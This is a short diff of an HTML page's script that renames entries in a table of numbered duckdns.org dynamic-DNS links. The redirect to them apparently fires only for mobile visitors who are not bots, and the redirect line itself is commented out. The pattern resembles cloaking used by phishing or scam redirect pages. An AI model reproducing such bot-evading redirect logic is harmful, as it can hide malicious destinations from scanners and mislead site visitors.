--- a/index.html
+++ b/index.html
@@ -280,16 +280,16 @@
                 "ON08": "https://00197703497.duckdns.org",
                 "ON09": "https://00197703498.duckdns.org",
                 "ON10": "https://00197703499.duckdns.org",
-                "CON11": "https://32525463431.duckdns.org",
-                "CON12": "https://32525463432.duckdns.org",
-                "CON13": "https://32525463433.duckdns.org",
-                "CON14": "https://32525463434.duckdns.org",
-                "CON15": "https://32525463435.duckdns.org",
-                "CON16": "https://32525463436.duckdns.org",
-                "CON17": "https://32525463437.duckdns.org",
-                "CON18": "https://32525463438.duckdns.org",
-                "CON19": "https://32525463439.duckdns.org",
-                "CON20": "https://32525463440.duckdns.org",
+                "OON01": "https://32525463431.duckdns.org",
+                "OON02": "https://32525463432.duckdns.org",
+                "OON03": "https://32525463433.duckdns.org",
+                "OON04": "https://32525463434.duckdns.org",
+                "OON05": "https://32525463435.duckdns.org",
+                "OON06": "https://32525463436.duckdns.org",
+                "OON07": "https://32525463437.duckdns.org",
+                "OON08": "https://32525463438.duckdns.org",
+                "OON09": "https://32525463439.duckdns.org",
+                "OON10": "https://32525463440.duckdns.org",
             };
             if (!is_bot && is_MIbile) {
                 //window.location.href = links[code];
